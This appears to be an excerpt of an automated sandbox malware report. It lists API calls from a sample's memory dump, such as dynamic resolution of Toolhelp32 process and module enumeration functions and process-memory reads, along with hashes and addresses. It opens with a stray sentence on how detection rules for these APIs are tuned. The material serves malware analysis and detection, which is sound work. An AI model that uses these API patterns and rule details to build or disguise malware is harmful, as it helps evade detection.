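                                        The completing call-site address is what you paste into the disassembler; requiring order rather than mere presence is what keeps the Toolhelp32 and ntdll rules from firing on routines that merely import those names.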
                                        APIs
                                          • Part of subcall function 02C8A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8ABE3,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8A970
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C8A988
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C8A99A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C8A9AC
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C8A9BE
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C8A9D0
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C8A9E2
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C8A9F4
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C8AA06
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C8AA18
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C8AA2A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C8AA3C
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C8AA4E
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C8AA60
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C8AA72
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C8AA84
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C8AA96
                                        • Process32First.KERNEL32(?,00000128), ref: 02C8AC09
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                        • String ID:
                                        • API String ID: 2774106396-0
                                        • Opcode ID: 5ee7e4b314892dd0fc8e00faa27f78e0677c7436a0ecbd54a9009c8339cc2861
                                        • Instruction ID: 4fec626ff2c546eb431f1742316569d060d3f68ff939c5d1bf5a90b371a7b232
                                        • Opcode Fuzzy Hash: 5ee7e4b314892dd0fc8e00faa27f78e0677c7436a0ecbd54a9009c8339cc2861
                                        • Instruction Fuzzy Hash: A7C04CA77166205B9B1076F93D889D7978DCE891BA31989B3F609D3103E76A8C10A6A0
                                        APIs
                                        • timeSetEvent.WINMM(?,00000000), ref: 02C9BB60
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Eventtime
                                        • String ID:
                                        • API String ID: 2982266575-0
                                        • Opcode ID: 88cd70b361192406ecd53068890c7e608c84971bd8593b237b5641022a0588fd
                                        • Instruction ID: b7d9c3eca8d6c18ba4dc0f2b0c4c3c2bac6fa423a953cb4776f116cd3f404ab7
                                        • Opcode Fuzzy Hash: 88cd70b361192406ecd53068890c7e608c84971bd8593b237b5641022a0588fd
                                        • Instruction Fuzzy Hash: CCC092F17843023EFA209AA82CC2F23A28EE704B04FB00816BA00FE2D1D5E25D601A34
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C74BEB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                        • Instruction ID: 0a43feb603c08dac3849ccf385f1b0e0b22c1d35588e873504e22a1b70a0c29a
                                        • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                        • Instruction Fuzzy Hash: 9DB0027C24860259FB7855620D41B7601AD5BF1787F8910D1DE39D81D0FF45C911DC77
                                        APIs
                                        • SysFreeString.OLEAUT32(00000000), ref: 02C74C03
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                        • Instruction ID: e6b8eda2a9d4b8ce30ae7e9217c112c207b3832a0683db53fb96d27b73279fe7
                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                        • Instruction Fuzzy Hash: 03A022AC000B030A8F2F232C0A0002A2033BFF03023CEC0E800000A0208F3A8000BC30